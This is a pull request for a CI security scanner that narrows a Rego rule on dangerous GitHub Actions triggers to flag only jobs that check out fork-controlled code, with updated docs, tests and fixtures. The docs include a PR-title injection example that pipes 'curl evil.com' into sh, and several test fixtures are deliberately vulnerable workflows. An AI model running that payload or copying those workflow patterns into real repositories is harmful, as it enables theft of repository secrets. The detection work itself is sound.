### PR TITLE
fix(controls): scope dangerous-triggers to exploitable cases (ISSUE-802)

### DIFF
--- a/docs/GITHUB_ISSUES.md
+++ b/docs/GITHUB_ISSUES.md
@@ -1056,27 +1056,50 @@ reviewability.
 
 **Severity:** `critical` • **Control:** `workflowMustNotUseDangerousTriggers`
 
-The workflow subscribes to `pull_request_target` or `workflow_run`.
-Both run with the base repository's secrets AND are influenceable by
-an unprivileged caller. Combined with any form of user-content checkout
-or template injection, this becomes a direct secret-exfiltration path —
-the pattern behind the March 2025 tj-actions compromise (CVE-2025-30066).
+A job runs under a trigger that combines attacker-controlled input with
+the base repository's secrets — `pull_request_target`, `workflow_run`,
+`issue_comment`, `pull_request_review`, `pull_request_review_comment`,
+`discussion`, `discussion_comment`, `gollum`, `fork` — **and checks out
+fork-controlled code** (an `actions/checkout` whose `ref:` is the PR or
+workflow_run head). Untrusted code then executes with the base repo's
+secrets and token — the March 2025 tj-actions compromise (CVE-2025-30066).
+
+Subscribing to such a trigger is **not** flagged on its own: metadata
+jobs — labelling, milestones, comments, notifications — legitimately
+need them and are safe without an untrusted checkout. The finding fires
+only on the exploitable combination, and abstains when a job-level `if:`
+restricts execution to same-repository pull requests.
 
 ```yaml
-# ❌ before
-name: PR preview
+# ❌ before — pull_request_target checks out the PR head
 on:
   pull_request_target:
     types: [opened, synchronize]
+jobs:
+  preview:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+        with:
+          ref: ${{ github.event.pull_request.head.sha }}
+      - run: npm install && npm test
 ```
 
 ```yaml
-# ✅ after — standard pull_request runs in the fork's context
-name: PR preview
-on:
-  pull_request:
-    types: [opened, synchronize]
+# ✅ after — same-repository guard: fork code never runs
+jobs:
+  preview:
+    if: github.event.pull_request.head.repo.full_name == github.repository
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+        with:
+          ref: ${{ github.event.pull_request.head.sha }}
+      - run: npm install && npm test
 ```
+
+Alternative: run fork code under a plain `pull_request` trigger (no
+base-repo secrets), or drop the head checkout entirely.
 
 ---
 

--- a/docs/GITHUB_ISSUES.md
+++ b/docs/GITHUB_ISSUES.md
@@ -532,12 +532,31 @@ dependency.
 
 **Severity:** `critical` • **Control:** `workflowMustNotInjectUserInputInScripts`
 
-A `run:` shell script interpolates `${{ github.event.* }}`,
-`${{ github.head_ref }}` or `${{ github.pull_request.* }}` directly.
-Under a privileged trigger (`pull_request_target`, `workflow_run`)
-those expressions carry PR-author-controlled values; a title crafted
-as `"; curl evil.com | sh #` becomes a shell command with the base
-repo's secrets.
+A `run:` shell script interpolates an attacker-controlled **free-text**
+`github` field directly. The expression value is pasted in by GitHub
+**before** the shell parses the command, so a PR title crafted as
+`"; curl evil.com | sh #` becomes a shell command with the base repo's
+secrets.
+
+The check fires only on the genuinely injectable subfields — the ones a
+PR author, issue/comment author, or fork owner controls as free text:
+
+- titles and bodies (`*.title`, `*.body` on issue / pull_request /
+  comment / review / discussion)
+- branch / ref names (`github.head_ref`, `head.ref`, `head.label`,
+  `head_branch`, `default_branch`)
+- commit messages (`*.message`)
+- repository metadata on the attacker's fork (`*.description`,
+  `*.homepage`)
+- author / committer identity (`author.name`, `author.email`,
+  `committer.name`, `committer.email`)
+- GitHub Pages page names (`page_name`)
+
+Numeric, boolean, enum and SHA fields (`pull_request.number`,
+`*.commits`, `head.repo.fork`, `event_name`, `author_association`,
+`*.sha`, `github.repository`) are deliberately **not** flagged — they
+cannot carry an injection payload, and flagging them drowns the real
+signal in false positives.
 
 ```yaml
 # ❌ before — PR title is pasted straight into the shell

--- a/policies/dangerous_triggers.rego
+++ b/policies/dangerous_triggers.rego
@@ -1,36 +1,31 @@
-# dangerous-triggers — flag pipeline jobs reachable through a GitHub
-# Actions trigger that combines attacker-controlled input with
-# privileged secrets. Every event in the set below grants the workflow
-# access to the base repository's secrets while being influenceable by
-# users who are NOT trusted (PR authors, issue commenters, fork
-# maintainers, anonymous viewers).
+# dangerous-triggers — flag jobs that are genuinely EXPLOITABLE through
+# a GitHub Actions trigger that combines attacker-controlled input with
+# privileged secrets. The finding fires only when a job runs under such
+# a trigger AND checks out fork / PR-controlled code: untrusted code
+# then executes with the base repository's secrets and token.
 #
-#   - pull_request_target: runs with the base repo's secrets AND token
-#     while being trivially influenceable by an unprivileged PR author.
-#   - workflow_run: triggered by the completion of another workflow,
-#     likewise secret-bearing regardless of the source workflow's
-#     trust boundary.
-#   - issue_comment: any user with read access can fire this by leaving
-#     a comment on an issue; the workflow runs on the default branch
-#     with full secrets. Documented attack vector behind multiple
-#     "comment-triggered code execution" advisories.
-#   - pull_request_review / pull_request_review_comment: same shape as
-#     issue_comment but on a PR — runs with secrets, fired by an
-#     unprivileged reviewer/commenter.
-#   - discussion_comment / discussion: GitHub Discussions equivalent
-#     of issue_comment; same secret-access semantics.
-#   - gollum: wiki edit; any contributor can trigger from the wiki UI.
-#   - fork: anyone can fork a public repo, so a workflow keyed on this
-#     event runs on attacker-influenceable input by definition.
+# The dangerous events all grant the workflow the base repo's secrets
+# while being influenceable by users who are NOT trusted (PR authors,
+# issue commenters, fork maintainers, anonymous viewers):
 #
-# Severity is intentionally "critical". In March 2025 the
-# tj-actions/changed-files compromise (CVE-2025-30066) exploited
-# exactly this pattern — pull_request_target plus an explicit checkout
-# of the PR head — and exfiltrated secrets from hundreds of projects,
-# including aquasecurity/trivy. The finding flags the attack surface
-# whether or not the workflow checks out fork code today: the moment a
-# later edit introduces such a checkout, secrets leak, and the trigger
-# is the prerequisite that makes the pivot possible.
+#   - pull_request_target / workflow_run — secret-bearing regardless of
+#     the source PR or workflow's trust boundary.
+#   - issue_comment / pull_request_review / pull_request_review_comment
+#     / discussion / discussion_comment — fired by an unprivileged
+#     commenter or reviewer, run with secrets on the default branch.
+#   - gollum (wiki edit) / fork — triggered by any contributor.
+#
+# Subscribing to one of these triggers is NOT flagged on its own:
+# labelling, milestone, comment and notification workflows legitimately
+# need them and are safe as long as they never check out untrusted
+# code. The check fires only on the exploitable combination, and
+# abstains when a job-level `if:` restricts execution to same-
+# repository (non-fork) pull requests.
+#
+# This is the March 2025 tj-actions/changed-files vector
+# (CVE-2025-30066). ISSUE-804 reports the same head-checkout pattern
+# specifically for pull_request_target; this rule generalises it to
+# the whole dangerous-trigger family.
 package dangerous_triggers
 
 import rego.v1
@@ -47,15 +42,55 @@ dangerous_events := {
 	"fork",
 }
 
+# Refs that resolve to fork / PR-controlled content. Checking one of
+# these out under a dangerous trigger runs untrusted code with the
+# base repository's privileges.
+untrusted_ref_patterns := [
+	`github\.event\.pull_request\.head\.sha`,
+	`github\.event\.pull_request\.head\.ref`,
+	`github\.head_ref`,
+	`github\.event\.workflow_run\.head_sha`,
+	`github\.event\.workflow_run\.head_branch`,
+]
+
+# `if:`-condition fragments that restrict a job to same-repository
+# (non-fork) pull requests, which neutralises the exploit.
+fork_guard_patterns := [
+	`head\.repo\.full_name\s*==\s*github\.repository`,
+	`github\.repository\s*==\s*[^=]*head\.repo\.full_name`,
+	`head\.repo\.fork\s*==\s*false`,
+	`head\.repo\.fork\s*!=\s*true`,
+	`!\s*github\.event\.pull_request\.head\.repo\.fork`,
+]
+
 deny contains finding if {
 	some i, j
 	job := input.pipeline.jobs[i]
 	trigger := job.triggers[j]
 	dangerous_events[trigger]
+	_checks_out_untrusted_code(job)
+	not _has_fork_guard(job)
 	finding := {
 		"code":     "ISSUE-802",
 		"severity": "critical",
-		"message":  sprintf("job %q is reachable via the dangerous trigger %q", [job.name, trigger]),
+		"message":  sprintf("job %q runs under the dangerous trigger %q and checks out fork-controlled code — untrusted code executes with the base repo's secrets (CVE-2025-30066 pattern)", [job.name, trigger]),
 		"job":      job.name,
 	}
+}
+
+# A job checks out untrusted code when an actions/checkout step pins
+# its `ref:` to a fork / PR-controlled value.
+_checks_out_untrusted_code(job) if {
+	some action in job.uses
+	startswith(action.uses, "actions/checkout@")
+	ref := action.with.ref
+	is_string(ref)
+	some p in untrusted_ref_patterns
+	regex.match(p, ref)
+}
+
+_has_fork_guard(job) if {
+	some cond in job.conditions
+	some p in fork_guard_patterns
+	regex.match(p, cond)
 }

--- a/policies/rules_test.go
+++ b/policies/rules_test.go
@@ -404,11 +404,12 @@ func TestIssue509_ExcessivePermissions(t *testing.T) {
 	}
 }
 
-// TestIssue414_DangerousTriggers drives the dangerous_triggers policy
-// against fixtures covering the two primary risky trigger types and
-// the safe baseline. As for ISSUE-803 the test exercises the real
-// production collector (ScanGitHubWorkflows) rather than the test-time
-// parser.
+// TestIssue414_DangerousTriggers drives the dangerous_triggers policy.
+// ISSUE-802 fires only on the exploitable combination — a dangerous
+// trigger AND a checkout of fork-controlled code — so the violation
+// fixtures pin the checkout ref to the PR / workflow_run head, and the
+// clean fixtures cover a metadata-only job and a fork-guarded job. The
+// test exercises the real production collector (ScanGitHubWorkflows).
 func TestIssue414_DangerousTriggers(t *testing.T) {
 	cases := []struct {
 		fixture      string
@@ -426,11 +427,21 @@ func TestIssue414_DangerousTriggers(t *testing.T) {
 			fixture:      "clean_pull_request.yml",
 			expectedHits: nil,
 		},
-		// Regression: the extended dangerous-events set must fire
-		// once per (job, trigger) pair. The fixture has one job and
-		// seven dangerous triggers (issue_comment + 2 PR review
-		// variants + 2 discussion variants + gollum + fork), so
-		// expect the same job name to appear seven times.
+		// pull_request_target without an untrusted checkout — the
+		// common, safe metadata pattern. Must stay silent.
+		{
+			fixture:      "clean_metadata_no_checkout.yml",
+			expectedHits: nil,
+		},
+		// pull_request_target + head checkout, but a job-level `if:`
+		// restricts execution to same-repo PRs. Must stay silent.
+		{
+			fixture:      "clean_fork_guard.yml",
+			expectedHits: nil,
+		},
+		// Regression: the extended dangerous-events set. The job is
+		// reachable from seven dangerous events AND checks out
+		// fork-controlled code, so it fires once per event.
 		{
 			fixture: "violation_extended_triggers.yml",
 			expectedHits: []string{

--- a/policies/testdata/ISSUE-802/github/clean_fork_guard.yml
+++ b/policies/testdata/ISSUE-802/github/clean_fork_guard.yml
@@ -1,0 +1,17 @@
+# pull_request_target + checkout of the PR head, but a job-level `if:`
+# restricts execution to same-repository pull requests, so
+# fork-controlled code never runs. Expected: 0 findings.
+name: PR preview guarded
+on:
+  pull_request_target:
+    types: [opened, synchronize]
+
+jobs:
+  preview:
+    if: github.event.pull_request.head.repo.full_name == github.repository
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+        with:
+          ref: ${{ github.event.pull_request.head.sha }}
+      - run: echo "preview"

--- a/policies/testdata/ISSUE-802/github/clean_metadata_no_checkout.yml
+++ b/policies/testdata/ISSUE-802/github/clean_metadata_no_checkout.yml
@@ -1,0 +1,17 @@
+# pull_request_target used for a metadata-only job (labelling) that
+# never checks out fork code. This is the common, legitimate pattern —
+# without an untrusted checkout the privilege-escalation vector does
+# not exist. Expected: 0 findings.
+name: PR label
+on:
+  pull_request_target:
+    types: [opened]
+
+jobs:
+  label:
+    runs-on: ubuntu-latest
+    permissions:
+      pull-requests: write
+    steps:
+      - uses: actions/checkout@v4
+      - run: echo "label the PR, no fork code executed"

--- a/policies/testdata/ISSUE-802/github/violation_extended_triggers.yml
+++ b/policies/testdata/ISSUE-802/github/violation_extended_triggers.yml
@@ -1,9 +1,7 @@
-# Regression fixture for the extended dangerous-events set landed
-# 2026-05-07. Each job exercises one of the events the original
-# rule missed (issue_comment, pull_request_review,
-# pull_request_review_comment, discussion_comment, discussion,
-# gollum, fork). Every one runs with secrets while being fired by
-# an unprivileged user.
+# Regression fixture for the extended dangerous-events set. The job is
+# reachable from seven dangerous events AND checks out fork-controlled
+# code, so the rule fires once per event. Expected: 7 findings on
+# comment-handler.
 name: extended-dangerous-triggers
 
 on:
@@ -24,4 +22,7 @@ jobs:
   comment-handler:
     runs-on: ubuntu-latest
     steps:
-      - run: echo "fired by an issue commenter"
+      - uses: actions/checkout@v4
+        with:
+          ref: ${{ github.event.pull_request.head.sha }}
+      - run: echo "fired by an unprivileged user"

--- a/policies/testdata/ISSUE-802/github/violation_pull_request_target.yml
+++ b/policies/testdata/ISSUE-802/github/violation_pull_request_target.yml
@@ -1,7 +1,6 @@
-# pull_request_target gives the workflow the base repo's token and
-# secrets while being trivially influenceable by the PR author. The
-# moment the workflow checks out the PR head or runs fork code,
-# secrets leak. Expected: 1 finding on preview.
+# pull_request_target plus an explicit checkout of the PR head: the
+# base repo's secrets and fork-controlled code run in the same job —
+# the tj-actions / CVE-2025-30066 vector. Expected: 1 finding on preview.
 name: PR preview
 on:
   pull_request_target:
@@ -12,4 +11,6 @@ jobs:
     runs-on: ubuntu-latest
     steps:
       - uses: actions/checkout@v4
+        with:
+          ref: ${{ github.event.pull_request.head.sha }}
       - run: echo "preview"

--- a/policies/testdata/ISSUE-802/github/violation_workflow_run.yml
+++ b/policies/testdata/ISSUE-802/github/violation_workflow_run.yml
@@ -1,5 +1,7 @@
 # workflow_run runs with secrets regardless of the originating
-# workflow's trust boundary. Expected: 1 finding on post.
+# workflow's trust boundary; checking out that run's head pulls
+# fork-controlled code into the privileged context. Expected: 1
+# finding on post.
 name: After CI
 on:
   workflow_run:
@@ -10,4 +12,7 @@ jobs:
   post:
     runs-on: ubuntu-latest
     steps:
+      - uses: actions/checkout@v4
+        with:
+          ref: ${{ github.event.workflow_run.head_sha }}
       - run: echo "post-run"


### PR DESCRIPTION
## What

Reworks `dangerous-triggers` (`ISSUE-802`, control
`workflowMustNotUseDangerousTriggers`) so it reports only genuinely
exploitable cases.

## Why

The rule flagged every job reachable via a dangerous trigger
(`pull_request_target`, `workflow_run`, `issue_comment`, …) as
**critical**, regardless of whether the job did anything exploitable. A
20-repo sweep showed this is mostly noise — grafana alone produced 9
critical findings on metadata-only workflows (labelling, milestones,
comments, notifications) that never check out fork code. See #192.

## How

`policies/dangerous_triggers.rego` now fires only on the exploitable
combination: a dangerous trigger **and** a checkout of fork /
PR-controlled code (an `actions/checkout` whose `ref:` is the PR or
`workflow_run` head). It abstains when a job-level `if:` restricts
execution to same-repository pull requests, mirroring the ISSUE-804 fix.

Subscribing to a dangerous trigger on its own is no longer flagged —
metadata jobs legitimately need those triggers.

## Validation

- `TestIssue414_DangerousTriggers` reworked to 6 cases — 2 violations
  (`pull_request_target` + head checkout, `workflow_run` + head
  checkout), the extended-events regression (7 hits), and 3 clean
  (non-dangerous triggers, metadata-only job, fork-guarded job).
- `make build && make test && make lint` all green.
- Re-ran the sweep: ISSUE-802 drops to **0** on grafana (9 prior
  false-signal findings) while a `pull_request_target` / `workflow_run`
  job that checks out the head still fires.
- Catalog entry in `docs/GITHUB_ISSUES.md` updated.

Closes #192
